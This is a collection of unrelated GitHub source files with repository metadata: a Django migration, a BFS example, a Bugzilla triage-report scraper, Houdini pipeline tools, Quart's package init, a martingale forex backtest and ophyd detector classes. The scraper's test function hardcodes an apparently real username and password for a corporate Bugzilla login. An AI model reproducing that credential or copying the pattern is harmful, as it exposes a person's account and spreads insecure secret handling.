# return route[0] if route else None
'''
| [
"noreply@github.com"
] | Zeventeen-17.noreply@github.com |
819ec1c8c8d85fbbd009ac02e237aa8676c7034b | fd20345d593aa0b500ab3af466ee5ead6fb8da21 | /apps/prettyboyapp/migrations/0009_auto_20180620_0121.py | a666e85cfbb94e9282c7625feddce1dd1316039e | [] | no_license | paulwine/prettyboyRepo1 | 7c25f6d276d88717a2c9667ec1fe6813181767cf | 7736a6a283bee7131200d44db799573c9b99d883 | refs/heads/master | 2021-06-28T19:06:23.370780 | 2020-09-02T15:51:00 | 2020-09-02T15:51:00 | 136,745,540 | 0 | 0 | null | 2018-07-12T02:43:46 | 2018-06-09T17:48:28 | Python | UTF-8 | Python | false | false | 838 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-20 01:21
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('prettyboyapp', '0008_auto_20180610_0034'),
]
operations = [
migrations.AddField(
model_name='ride',
name='appointment_time',
field=models.TimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='ride',
name='duration',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='ride',
name='pickup_datetime',
field=models.DateField(),
),
]
| [
"paulwinegard@gmail.com"
] | paulwinegard@gmail.com |
8d88b612386c5811f2709b90cd9a046cf5b1236e | 0e1e8d9a3622070bed359b9d062a4e51fbf169e5 | /graphs/BAckTraceBFS.py | 0d774ed89f2fe93f1f54126955837afff4e645d9 | [] | no_license | anuragdogra2192/Data_structures_with_python3 | 69f4aed4cbe17fd449b1bdc225c5d1d832af5e4f | d8b5b3dd8beb8ec0516d89a7be17d2a3cec8119d | refs/heads/master | 2023-02-19T23:59:21.142338 | 2023-02-15T10:51:59 | 2023-02-15T10:51:59 | 188,711,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | #!/usr/bin/env python3
# graph is in adjacent list representation
graph = {
'1': ['2', '3', '4'],
'2': ['5', '6'],
'5': ['9', '10'],
'4': ['7', '8'],
'7': ['11', '12']
}
def bfs(graph, start, end):
# maintain a queue of paths
queue = []
# push the first path into the queue
queue.append([start])
while queue:
# get the first path from the queue
path = queue.pop(0)
# get the last node from the path
node = path[-1]
# path found
if node == end:
return path
# enumerate all adjacent nodes, construct a
# new path and push it into the queue
for adjacent in graph.get(node, []):
new_path = list(path)
new_path.append(adjacent)
queue.append(new_path)
print(bfs(graph, '1', '11')) | [
"anuragdogra.2192@gmail.com"
] | anuragdogra.2192@gmail.com |
6c3830beabee9c3e23adcf288f92d160bd2bae52 | f806767449782b48517f33032ca9bec2849b18fb | /Triage_Report.py | 668c3805b93fd98ce4e46e16fa1040edb18a39a8 | [] | no_license | abcwangxiang/web_develop | b1445652f4142acc4286773ae4f6abef8749510d | 84d51b32271648331916038631e46b10279f8c46 | refs/heads/master | 2021-01-10T18:44:44.066255 | 2015-06-10T11:32:42 | 2015-06-10T11:32:42 | 37,596,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,404 | py | import os
import re
import urllib
import cookielib
import xmlrpclib, httplib, sys
from urlparse import urljoin
import mechanize
from bs4 import BeautifulSoup
#report_order = ['triaged', 'fixed']
report_order = ['triaged','fixed', 'no_checkin_request', 'no_checkin']
class Triage_Report:
def __init__(self, username, password):
self.username = username
self.password = password
self.report_item = dict()
self.report_item['fixed'] = {'params_func':self.fixed_params, 'desc_func':self.fixed_description}
self.report_item['triaged'] = {'params_func':self.triaged_params, 'desc_func':self.triaged_description}
self.report_item['no_checkin_request'] = {'params_func':self.no_checkin_request_params, 'desc_func':self.no_checkin_request_description}
self.report_item['no_checkin'] = {'params_func':self.no_checkin_params, 'desc_func':self.no_checkin_description}
self.report_list = report_order
def get_logined_browser(self):
username = self.username
password = self.password
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(False)
br.set_handle_gzip(False)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefererProcessor(), max_time=1)
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_responses(False)
br.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)')]
#br.set_proxies({'http': 'http://proxy.vmware.com:3128', 'https': 'http://proxy.vmware.com:3128'})
page = br.open('https://bugzilla.eng.vmware.com/index.cgi')
#print page.read()
br.select_form(nr=0)
br.form.set_all_readonly(False)
br['Bugzilla_login'] = username
br['Bugzilla_password'] = password
r = br.submit()
res = r.get_data()
#print res
return br
def get_report_data(self, report_name, options):
params = self.report_item[report_name]['params_func'](options)
br = self.get_logined_browser()
data = urllib.urlencode(params)
print data
post_url = '''https://bugzilla.eng.vmware.com/buglist.cgi'''
page = br.open(post_url,data)
try:
result = self.page_to_dict(page)
except:
result = dict()
result['head'] = ['']
result['data'] = ['']
result['params'] = data
result['name'] = report_name
result['description'] = self.report_item[report_name]['desc_func'](options)
return result
def page_to_dict(self, page):
result = dict()
data = list()
soup = BeautifulSoup(page)
rows = soup.find("table", id='buglistSorter').find("tbody").find_all("tr")
for row in rows:
rowdata = list()
cells = row.find_all("td")
for cell in cells:
rn = cell.get_text()
rowdata.append(rn)
data.append(rowdata)
head = list()
row = soup.find("table", id='buglistSorter').find("thead").find("tr")
cells = row.find_all("th")
for cell in cells:
rn = cell.get_text().replace('\n','').strip()
head.append(rn)
result['head'] = head
result['data'] = data
return result
def read_default_params(self, filename):
file_name = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'Triage_Chart_Query_Template', filename)
file = open(file_name)
content = file.read()
lines = content.splitlines()
params = list()
for line in lines:
if line.strip().startswith('#') or not line:
continue
tuple = line.split("=")
params.append((tuple[0], tuple[1]))
return params
def get_report_name_list(self):
return self.report_list
def fixed_params(self, options):
params = self.read_default_params('fixed.txt')
assigned_to = options['assigned_to']
params.append(('email1', assigned_to))
params.append(('chfieldfrom', options['date_begin']))
params.append(('chfieldto', options['date_end']))
for fix_by_product_name in options['fix_by_product_name']:
params.append(('fix_by_product_name', fix_by_product_name))
for fix_by_version_name in options['fix_by_version_name']:
params.append(('fix_by_version_name', fix_by_version_name))
for fix_by_phase_name in options['fix_by_phase_name']:
params.append(('fix_by_phase_name', fix_by_phase_name))
return params
def fixed_description(self, options):
return "Bugs been fixed between %s and %s" %(options['date_begin'], options['date_end'])
def triaged_params(self, options):
params = self.read_default_params('triaged.txt')
assigned_to = options['assigned_to']
params.append(('email1', assigned_to))
params.append(('chfieldfrom', options['date_begin']))
params.append(('chfieldto', options['date_end']))
for fix_by_product_name in options['fix_by_product_name']:
params.append(('fix_by_product_name', fix_by_product_name))
for fix_by_version_name in options['fix_by_version_name']:
params.append(('fix_by_version_name', fix_by_version_name))
for fix_by_phase_name in options['fix_by_phase_name']:
params.append(('fix_by_phase_name', fix_by_phase_name))
return params
def triaged_description(self, options):
return "Bugs been triage-accepted between %s and %s" %(options['date_begin'], options['date_end'])
def no_checkin_request_params(self, options):
params = self.read_default_params('no_checkin_request.txt')
assigned_to = options['assigned_to']
params.append(('email1', assigned_to))
#no need time frame
#params.append(('chfieldfrom', options['date_begin']))
#params.append(('chfieldto', options['date_end']))
for fix_by_product_name in options['fix_by_product_name']:
params.append(('fix_by_product_name', fix_by_product_name))
for fix_by_version_name in options['fix_by_version_name']:
params.append(('fix_by_version_name', fix_by_version_name))
for fix_by_phase_name in options['fix_by_phase_name']:
params.append(('fix_by_phase_name', fix_by_phase_name))
return params
def no_checkin_request_description(self, options):
return "Bugs in triage-accepted status, but NO CheckinApprovalRequested filed"
def no_checkin_params(self, options):
params = self.read_default_params('no_checkin.txt')
assigned_to = options['assigned_to']
params.append(('email1', assigned_to))
#no need time frame
#params.append(('chfieldfrom', options['date_begin']))
#params.append(('chfieldto', options['date_end']))
for fix_by_product_name in options['fix_by_product_name']:
params.append(('fix_by_product_name', fix_by_product_name))
for fix_by_version_name in options['fix_by_version_name']:
params.append(('fix_by_version_name', fix_by_version_name))
for fix_by_phase_name in options['fix_by_phase_name']:
params.append(('fix_by_phase_name', fix_by_phase_name))
return params
def no_checkin_description(self, options):
return "Bugs been CheckinApproved, but code haven't been checked in yet"
def test():
options = dict()
options['assigned_to'] = 'fangchiw,hillzhao,vaibhavk,shanpeic,nmukuri'
options['date_begin'] = '2014-09-15'
options['date_end'] = '2014-09-23'
options['fix_by_product_name'] = ['vsphere', 'esx']
options['fix_by_version_name'] = ['5.1 P06', '5.1 P06Ps']
options['fix_by_phase_name'] = []
tr = Triage_Report('fangchiw', '''we'reno.2''')
for report_item in tr.get_report_name_list():
print tr.get_report_data(report_item, options)
#test()
| [
"fangchiw@vmware.com"
] | fangchiw@vmware.com |
5b84c8e2df7b21d734d52b16a4f8de9d6aa1f669 | 74306310e5c235164ee27f3ea6591e7d4aa5d8c7 | /EVE/tools/createScene.py | e0134e8b7eecae1e890ac33d8cbf9734f81c6423 | [] | no_license | Kolominsky/Houdini | afaf60c15ea6abba9d46aca0f5a41d1ad39fc3c1 | 0faefdda0c86731678f5a5cd4adaab937b2dc964 | refs/heads/master | 2020-04-18T10:44:33.254304 | 2019-01-23T21:30:37 | 2019-01-23T21:30:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,772 | py | # 256 Pipeline tools
# Create ANIMATION and RENDER scenes
import hou
import os
from PySide2 import QtCore, QtUiTools, QtWidgets
from EVE.dna import dna
reload(dna)
# Get Houdini root nodes
sceneRoot = hou.node('/obj/')
outRoot = hou.node('/out/')
class SNV(QtWidgets.QWidget):
def __init__(self, filePath, sceneType):
# Setup UI
super(SNV, self).__init__()
self.sceneType = sceneType # RND, ANM etc. To return back to CS object
ui_file = '{}/saveNextVersion_Warning.ui'.format(dna.folderUI)
self.ui = QtUiTools.QUiLoader().load(ui_file, parentWidget=self)
self.setParent(hou.ui.mainQtWindow(), QtCore.Qt.Window)
# Setup label
message = 'File exists!\n{}'.format(dna.analyzeFliePath(filePath)['fileName'])
self.ui.lab_message.setText(message)
# Setup buttons
self.ui.btn_SNV.clicked.connect(self.SNV)
self.ui.btn_SNV.clicked.connect(self.close)
self.ui.btn_OVR.clicked.connect(self.OVR)
self.ui.btn_OVR.clicked.connect(self.close)
self.ui.btn_ESC.clicked.connect(self.close)
def SNV(self):
CS.createScene(self.sceneType, 'SNV')
def OVR(self):
CS.createScene(self.sceneType, 'OVR')
class CreateScene(QtWidgets.QWidget):
def __init__(self):
super(CreateScene, self).__init__()
ui_file = "{}/createScene_Main.ui".format(dna.folderUI)
self.ui = QtUiTools.QUiLoader().load(ui_file, parentWidget=self)
self.setParent(hou.ui.mainQtWindow(), QtCore.Qt.Window)
self.ui.btn_createRenderScene.clicked.connect(lambda: self.createScene(fileType=dna.fileTypes['renderScene']))
self.ui.btn_createRenderScene.clicked.connect(self.close)
def createScene(self, fileType, catch = None):
'''
Save new scene, build scene content.
:param sceneType: type of created scene, Render, Animation etc
:param catch: determinate if procedure were run for the firs time from this class,
or it returns user reply from SNV class
:return:
'''
# Get sequence and shot from UI
sequenceNumber = self.ui.lin_episode.text()
shotNumber = self.ui.lin_shot.text()
# If createRenderScene() runs first time
if catch == None:
# Build path to 001 version
pathScene = dna.buildFliePath('001', fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber)
# Start new Houdini session without saving current
hou.hipFile.clear(suppress_save_prompt=True)
# Check if file exists
if not os.path.exists(pathScene):
# Save first version if NOT EXISTS
hou.hipFile.save(pathScene)
hou.ui.displayMessage('File created:\n{}'.format(pathScene.split('/')[-1]))
# print '>> First version of file saved!'
else:
# If 001 version exists, get latest existing version
pathScene = dna.buildPathLatestVersion(pathScene)
# Run Save Next Version dialog if EXISTS
winSNV = SNV(pathScene, fileType)
winSNV.show()
return
# If createRenderScene() runs from SNV class: return user choice, OVR or SNV
elif catch == 'SNV':
# Save latest version
newPath = dna.buildPathNextVersion(dna.buildPathLatestVersion(dna.buildFliePath('001', fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber)))
hou.hipFile.save(newPath)
hou.ui.displayMessage('New version saved:\n{}'.format(newPath.split('/')[-1]))
elif catch == 'OVR':
# Overwrite existing file
pathScene = dna.buildPathLatestVersion(dna.buildFliePath('001', fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber))
hou.hipFile.save(pathScene)
hou.ui.displayMessage('File overwited:\n{}'.format(pathScene.split('/')[-1]))
else:
return
# Build scene content
self.buildSceneContent(fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber)
def createHDA(self, parent, hdaTypeName, hdaName):
'''
Create Houdini digital asset node
:param hdaTypeName:
:param hdaName:
:return:
'''
# Create HDA node inside parent container
hda = parent.createNode(hdaTypeName, hdaName)
# Set HDA file version (latest)
hdaDefinitions = hda.type().allInstalledDefinitions()
hdaPaths = [i.libraryFilePath() for i in hdaDefinitions]
latestVersion = dna.extractLatestVersionFile(hdaPaths) # 010
for i in hdaPaths:
if latestVersion in i.split('/')[-1]:
latestIndex = hdaPaths.index(i)
hdaDefinitions[latestIndex].setIsPreferred(True)
def createContainer(self, parent, name, bbox=0, mb=None, disp=1):
'''
Create scene container for CHARS, ENV etc
:param parent: container node parent object (where to cretae it)
:param name: container name
:param bbox: display container content as bounding box (bbox = 2, full = 0)
:param mb: turn on motion blur for container content geometry
:param disp: Display container node flag (ON = 1, OFF = 0)
:return:
'''
CONTAINER = parent.createNode('geo',name)
# Delete all nodes in container
for node in CONTAINER.children():
node.destroy()
# Display as bounding box
CONTAINER.parm('viewportlod').set(bbox)
# Set display flag
CONTAINER.setDisplayFlag(disp)
# Turn ON motion blur
if mb is not None:
CONTAINER.parm('geo_velocityblur').set(1)
return CONTAINER
def convertPathCache(self, pathCache):
'''
Convert geometry cache string path (used in FileCacheSOP) to path suitable for dna.extractLatestVersionFolder()
Expand $JOB variable to a full path, remove file name
:param pathCache:
:return :
'''
fileName = pathCache.split('/')[-1]
pathCacheFolder = pathCache.replace('$JOB', dna.root3D).replace(fileName, '')
return pathCacheFolder
def buildCharacterLoaders(self, CHARACTERS, charactersData):
'''
Create network to load characters data (geo cache, hairs, etc)
TBD: merge loaders in several chars are in shot
:param CHARACTERS: Characters container - geometry node object
:param charactersData: dictionaries with character data linked to a shot
:return:
'''
for characterData in charactersData:
# Create nodes network for each character
characterName = characterData['code']
cache = CHARACTERS.createNode('filecache', 'CACHE_{0}'.format(characterName))
cache.parm('loadfromdisk').set(1)
null = CHARACTERS.createNode('null', 'OUT_{0}'.format(characterName))
null.setInput(0, cache)
# Build and set path to the 001 cache version
pathCache = dna.buildFliePath('001',
dna.fileTypes['cacheAnim'],
scenePath=hou.hipFile.path(),
characterName=characterName)
cache.parm('file').set(pathCache)
# Set render flags
null.setDisplayFlag(1)
null.setRenderFlag(1)
CHARACTERS.layoutChildren()
def importAnimation(self, scenePath, charactersData):
'''
Import character animation for the current render scene: set FileCache nodes paths.
pathCache = $JOB/geo/SHOTS/010/SHOT_010/ROMA/GEO/001/E010_S010_ROMA_001.$F.bgeo.sc
:param charactersData: list of characters dics for the current shot
:param scenePath: Full path to Houdini render scene
:return:
'''
for characterData in charactersData:
characterName = characterData['code']
# BUILD CACHE PATH (LATEST VERSION)
# Build a path to the 001 version of cache
pathCache = dna.buildFliePath('001',
dna.fileTypes['cacheAnim'],
scenePath=scenePath,
characterName=characterName)
# Check latest existing version, build new path if exists
pathCacheFolder = self.convertPathCache(pathCache)
latestCacheVersion = dna.extractLatestVersionFolder(pathCacheFolder)
if latestCacheVersion != '001':
pathCache = dna.buildFliePath(latestCacheVersion,
dna.fileTypes['cacheAnim'],
scenePath=scenePath,
characterName=characterName)
# SET FILE CACHE NODE PARAM
# Get cache node
cache = hou.node('{0}/{1}/CACHE_{2}'.format(sceneRoot, dna.nameChars, characterName))
# Set path
cache.parm('file').set(pathCache)
def buildSceneContent(self, fileType, sequenceNumber, shotNumber):
'''
Create scene content: import characters, environments, materials etc.
:param fileType:
:param sequenceNumber:
:param shotNumber:
:return:
'''
# Create Render scene
if fileType == dna.fileTypes['renderScene']:
# Get shot data
shotData, assetsData, environmentData, charactersData = dna.getShotGenes(sequenceNumber, shotNumber)
# Initialize scene
scenePath = hou.hipFile.path()
# BUILD ENVIRONMENT
# Proxy
ENV_PRX = self.createContainer(sceneRoot, dna.nameEnvProxy)
self.createHDA(ENV_PRX, environmentData['proxy_hda']['hda_name'], environmentData['proxy_hda']['name'])
ENV_PRX.setPosition([0, 0])
# Base
ENVIRONMENT = self.createContainer(sceneRoot, dna.nameEnv, bbox=2, disp=0)
self.createHDA(ENVIRONMENT, environmentData['hda_name'], environmentData['code'])
ENVIRONMENT.setPosition([0, -dna.nodeDistance_y])
# Animation
ENV_ANM = self.createContainer(sceneRoot, dna.nameEnvAnim, bbox=2, mb=1)
self.createHDA(ENV_ANM, environmentData['animation_hda']['hda_name'], environmentData['animation_hda']['name'])
ENV_ANM.setPosition([0, -2 * dna.nodeDistance_y])
CROWDS = self.createContainer(sceneRoot, dna.nameCrowds, bbox=2, mb=1)
self.createHDA(CROWDS, environmentData['crowds_hda']['hda_name'], environmentData['crowds_hda']['name'])
CROWDS.setPosition([0, -3 * dna.nodeDistance_y])
# BUILD CHARACTERS
# Create characters container
CHARACTERS = self.createContainer(sceneRoot, dna.nameChars, mb=1)
CHARACTERS.setPosition([0, -4 * dna.nodeDistance_y])
# Create nodes to pull character caches
self.buildCharacterLoaders(CHARACTERS, charactersData)
# IMPORT MATERIALS
# Create Geometry node in scene root
ML = sceneRoot.createNode('ml_general', dna.nameMats)
ML.setPosition([dna.nodeDistance_x, 0])
# IMPORT ENV LIGHTS
LIT = sceneRoot.createNode(environmentData['light_hda']['hda_name'], environmentData['light_hda']['name'])
LIT.setPosition([dna.nodeDistance_x, -dna.nodeDistance_y])
# SETUP OUTPUT
# Create mantra render node
mantra = outRoot.createNode('ifd', 'RENDER')
# Render file version setup
# renderFile = '$JOB/render/010/SHOT_040/001/E010_S040_001.$F.exr'
renderFile = dna.buildFliePath('001', dna.fileTypes['renderFile'], scenePath=scenePath)
fileLocation = dna.analyzeFliePath(renderFile)['fileLocation']
if not os.path.exists(fileLocation):
# Make 001 folder
os.makedirs(fileLocation)
else:
# If 001 file exists get latest version
latestVersion = dna.extractLatestVersionFolder(fileLocation)
nextVersion = '{:03d}'.format(int(latestVersion) + 1)
# Build latest existing path
renderFile = dna.buildFliePath(nextVersion, dna.fileTypes['renderFile'], scenePath=scenePath)
os.makedirs(dna.analyzeFliePath(renderFile)['fileLocation'])
# Localize path (add $JOB)
renderFile = renderFile.replace(dna.root3D, '$JOB')
# Setup Mantra parameters
mantra.parm('vm_picture').set(renderFile)
mantra.parm('camera').set('/obj/E{0}_S{1}'.format(sequenceNumber, shotNumber))
# Set common parameters from preset
for param, value in dna.renderSettings['common'].iteritems():
mantra.parm(param).set(value)
# Set DRAFT parameters
for param, value in dna.renderSettings['draft'].iteritems():
mantra.parm(param).set(value)
# SETUP SCENE (end frame ...)
frameEnd = shotData['sg_cut_out']
hou.playbar.setFrameRange(dna.frameStart, frameEnd)
hou.playbar.setPlaybackRange(dna.frameStart, frameEnd)
# IMPORT ANIMATION
# Import characters caches
self.importAnimation(scenePath, charactersData)
# Save scene
hou.hipFile.save()
# Create CS object
CS = CreateScene()
def run():
# Run the Create Scene Tool
CS.show() | [
"KKO8@dsone.3ds.com"
] | KKO8@dsone.3ds.com |
1e5122dc89c65f5bcead30da6a84115a1b6723ee | 94f978c65b6368f936e18364cc477591094750f5 | /quart/__init__.py | c7fa2b897ed9969c7681fd2a6aa8a28fd1fd4750 | [
"MIT"
] | permissive | tharvik/quart | 2a4ff330dd384dc9f917b179e8d247808e7ccd6c | 038680bcc1c0966481d73bdbe474f55a3ce104f4 | refs/heads/master | 2021-04-18T21:54:18.339532 | 2018-03-06T08:06:33 | 2018-03-06T08:11:48 | 126,790,492 | 0 | 0 | null | 2018-03-26T07:29:58 | 2018-03-26T07:29:58 | null | UTF-8 | Python | false | false | 2,082 | py | from jinja2 import escape, Markup
from .__about__ import __version__
from .app import Quart
from .blueprints import Blueprint
from .config import Config
from .ctx import (
after_this_request, copy_current_request_context, copy_current_websocket_context,
has_app_context, has_request_context, has_websocket_context,
)
from .exceptions import abort
from .globals import (
_app_ctx_stack, _request_ctx_stack, _websocket_ctx_stack, current_app, g, request, session,
websocket,
)
from .helpers import (
flash, get_flashed_messages, get_template_attribute, make_response, stream_with_context,
url_for,
)
from .json import jsonify
from .signals import (
appcontext_popped, appcontext_pushed, appcontext_tearing_down, before_render_template,
got_request_exception, message_flashed, request_finished, request_started,
request_tearing_down, signals_available, template_rendered,
)
from .static import safe_join, send_file, send_from_directory
from .templating import render_template, render_template_string
from .typing import ResponseReturnValue
from .utils import redirect
from .wrappers import Request, Response
__all__ = (
'__version__', '_app_ctx_stack', '_request_ctx_stack', '_websocket_ctx_stack', 'abort',
'after_this_request', 'appcontext_popped', 'appcontext_pushed', 'appcontext_tearing_down',
'before_render_template', 'Blueprint', 'Config', 'copy_current_request_context',
'copy_current_websocket_context', 'current_app', 'escape', 'flash', 'g',
'get_flashed_messages', 'get_template_attribute', 'got_request_exception', 'has_app_context',
'has_request_context', 'has_websocket_context', 'htmlsafe_dumps', 'jsonify', 'make_response',
'Markup', 'message_flashed', 'Quart', 'redirect', 'render_template', 'render_template_string',
'request', 'Request', 'request_finished', 'request_started', 'request_tearing_down',
'Response', 'ResponseReturnValue', 'safe_join', 'send_file', 'send_from_directory', 'session',
'signals_available', 'stream_with_context', 'template_rendered', 'url_for', 'websocket',
)
| [
"philip.graham.jones@googlemail.com"
] | philip.graham.jones@googlemail.com |
9a595b0c0afd43784fd25b50fbdf0f7538d47de5 | a7780057b446fefea67ba98de074b543216b69df | /version1_antimart.py | d282b875ffbd3e23d131a8f87862a292f28228cd | [] | no_license | kgodonoghue/FX_2020 | a8101876186b16d3fd06f0fc81bdd68d34aad0ae | f97432f68773bef23d3065e2ff5b7ef14a333e55 | refs/heads/master | 2022-04-27T07:31:41.905412 | 2020-04-18T16:04:16 | 2020-04-18T16:04:16 | 254,858,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,385 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 2 18:26:16 2019
@author: kgodo
# counter added and time after the limit hit
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import classification_report
from pandas import DataFrame, read_csv
import time
import matplotlib.pyplot as plt
from math import *
from random import randint
from sklearn.preprocessing import MinMaxScaler
import datetime
import time
from pandas_ml import ConfusionMatrix
from sklearn.tree import DecisionTreeRegressor
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import confusion_matrix
import numpy as np
buy_counter=[]
def martFuncBuy(data,cost,SL,TP,multiplier,martSteps,factor,capital,pipBet,startPoint,martLimit,tick_count_limit,sample):
buy_counter=[]
SL=SL/factor
TP=TP/factor
cost=cost/factor
profitArray=np.zeros(len(data))
bBuy=1
mBuy=-1
martCountBuy=1
data=np.array(data)
data=data[1::sample]
timer_bit=0
tick_count=0
for a in range(startPoint,len(data)):
if timer_bit==1:
tick_count=tick_count+1
if tick_count>tick_count_limit:
tick_count=0
timer_bit=0
continue
if (((data[a]-data[bBuy])>TP and martCountBuy>martSteps)):
buy_counter.append(martCountBuy)
martCountBuy=1
profitArray[a]=mBuy*(data[a]-data[a-1])+mBuy*cost
mBuy=-1
bBuy=a
elif ((martCountBuy==martLimit)):
buy_counter.append(martCountBuy)
martCountBuy=1
profitArray[a]=mBuy*(data[a]-data[a-1])+mBuy*cost
mBuy=-1
bBuy=a
timer_bit=1
elif ((data[a]-data[bBuy])>TP):
martCountBuy=1
mBuy=-1
bBuy=a
elif (data[a]-data[bBuy]<-SL and martCountBuy>martSteps):
martCountBuy=martCountBuy+1;
profitArray[a]=mBuy*(data[a]-data[a-1])+mBuy*cost;
bBuy=a
mBuy=mBuy*multiplier
elif ((data[a]-data[bBuy])<-SL):
martCountBuy=martCountBuy+1
bBuy=a
mBuy=-1
elif martCountBuy>martSteps:
profitArray[a]=mBuy*(data[a]-data[a-1])
profitArray=pipBet*profitArray
return profitArray, buy_counter
def martFuncSell(data,cost,SL,TP,multiplier,martSteps,factor,capital,pipBet,startPoint,martLimit,tick_count_limit,sample ):
sell_counter=[]
SL=SL/factor
TP=TP/factor
cost=cost/factor
profitArray=np.zeros(len(data))
bSell=1
mSell=1
martCountSell=1
data=np.array(data)
data=data[1::sample]
timer_bit=0
tick_count=0
for a in range(startPoint,len(data)):
if timer_bit==1:
tick_count=tick_count+1
if tick_count>tick_count_limit:
tick_count=0
timer_bit=0
continue
if (((data[a]-data[bSell])<-TP and martCountSell>martSteps)):
sell_counter.append(martCountSell)
martCountSell=1
profitArray[a]=mSell*(data[a]-data[a-1])-mSell*cost
mSell=1
bSell=a
elif ((martCountSell==martLimit)):
sell_counter.append(martCountSell)
martCountSell=1
profitArray[a]=mSell*(data[a]-data[a-1])-mSell*cost
mSell=1
bSell=a
timer_bit=1
elif ((data[a]-data[bSell])<-TP):
martCountSell=1
mSell=1
bSell=a
elif (data[a]-data[bSell]>SL and martCountSell>martSteps):
martCountSell=martCountSell+1;
profitArray[a]=mSell*(data[a]-data[a-1])-mSell*cost;
bSell=a
mSell=mSell*multiplier
elif ((data[a]-data[bSell])>SL):
martCountSell=martCountSell+1
bSell=a
mSell=1
elif martCountSell>martSteps:
profitArray[a]=mSell*(data[a]-data[a-1])
profitArray=pipBet*profitArray
return profitArray, sell_counter
#currency='USDMXN'
currency='usdjpy'
#currency='XAUUSD'
#currency='BITCOIN'
year_start=2015
year_stop=2021
path_data =r'E:/trading/data/' + currency + '/'
SL=20
TP=20
commision=0.00005
multiplier=2
martSteps=0
capital=1000000
pipBet=2000
startPoint=1
tick_count_limit=0
sample=1
year_result=[]
if __name__ == '__main__':
for martLimit in range(11,12):
for year in range(year_start,year_stop):
print(year)
data = pd.read_csv(path_data + str(currency) + str(year) + '.csv')
cost=abs(data['Ask']-data['Bid']).mean()+commision
data = data['Ask']
factor=data[1]/100
if factor<0.2:
factor=10000
elif factor<2:
factor=100
else:
factor=1
#sentiment = data['AskVolume']- data['BidVolume']
#sentiment=sentiment.rolling(window=1000).mean()
[profitArrayBuy,buy_counter]=martFuncBuy(data,cost,SL,TP,multiplier,martSteps,factor,capital,pipBet,startPoint,martLimit,tick_count_limit,sample)
[profitArraySell,sell_counter]=martFuncSell(data,cost,SL,TP,multiplier,martSteps,factor,capital,pipBet,startPoint,martLimit,tick_count_limit,sample)
profitArrayBuy=np.cumsum(profitArrayBuy)
profitArraySell=np.cumsum(profitArraySell)
year_result.append([martLimit,tick_count_limit,year,profitArrayBuy[len(profitArrayBuy)-1],profitArraySell[len(profitArraySell)-1],profitArrayBuy[len(profitArrayBuy)-1]+profitArraySell[len(profitArraySell)-1]])
plt.plot((profitArrayBuy+profitArraySell)+capital)
| [
"noreply@github.com"
] | kgodonoghue.noreply@github.com |
9cebfe78ac4726d95ef3d85151f40b31288a7c66 | 71962596a0693e03e19257f1beb3bdda223ed4ff | /profile_xf05id1/startup/80-areadetectors.py | 606dcb874953ff5d84513d47929ed37814781b3f | [
"BSD-2-Clause"
] | permissive | tacaswell/ipython_srx | 53561979f27a108063f4851ea314073768098cbb | e3dbb45cfd87c166878e8420654cc7995f772eda | refs/heads/master | 2020-12-25T00:19:11.936763 | 2016-02-18T00:30:51 | 2016-02-18T00:30:51 | 51,659,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | from ophyd.areadetector import (AreaDetector, ImagePlugin,
TIFFPlugin, StatsPlugin, HDF5Plugin,
ProcessPlugin)
from ophyd.areadetector.cam import AreaDetectorCam
from ophyd.device import BlueskyInterface
from ophyd.areadetector.trigger_mixins import SingleTrigger
from ophyd.areadetector.filestore_mixins import (FileStoreIterativeWrite,
FileStoreHDF5IterativeWrite,
FileStoreTIFFSquashing,
FileStoreTIFF)
from ophyd import Signal
from ophyd import Component as C
class SRXTIFFPlugin(TIFFPlugin, FileStoreTIFF,
FileStoreIterativeWrite):
pass
class BPMCam(SingleTrigger, AreaDetector):
cam = C(AreaDetectorCam, '')
image = C(ImagePlugin, 'image1:')
tiff = C(SRXTIFFPlugin, 'TIFF1:',
write_path_template='/epicsdata/bpm1-cam1/2016/2/17/')
# write_path_template='/epicsdata/bpm1-cam1/%Y/%m/%d/')
stats1 = C(StatsPlugin, 'Stats1:')
stats2 = C(StatsPlugin, 'Stats2:')
stats3 = C(StatsPlugin, 'Stats3:')
stats4 = C(StatsPlugin, 'Stats4:')
# this is flakey?
# stats5 = C(StatsPlugin, 'Stats5:')
pass
bpmAD = BPMCam('XF:05IDA-BI:1{BPM:1-Cam:1}', name='bpmAD', read_attrs=['tiff'])
bpmAD.read_attrs = ['tiff', 'stats1', 'stats2', 'stats3', 'stats4']
bpmAD.tiff.read_attrs = []
bpmAD.stats1.read_attrs = ['total']
bpmAD.stats2.read_attrs = ['total']
bpmAD.stats3.read_attrs = ['total']
bpmAD.stats4.read_attrs = ['total']
| [
"xf05id1@xf05id1-ws2.cs.nsls2.local"
] | xf05id1@xf05id1-ws2.cs.nsls2.local |
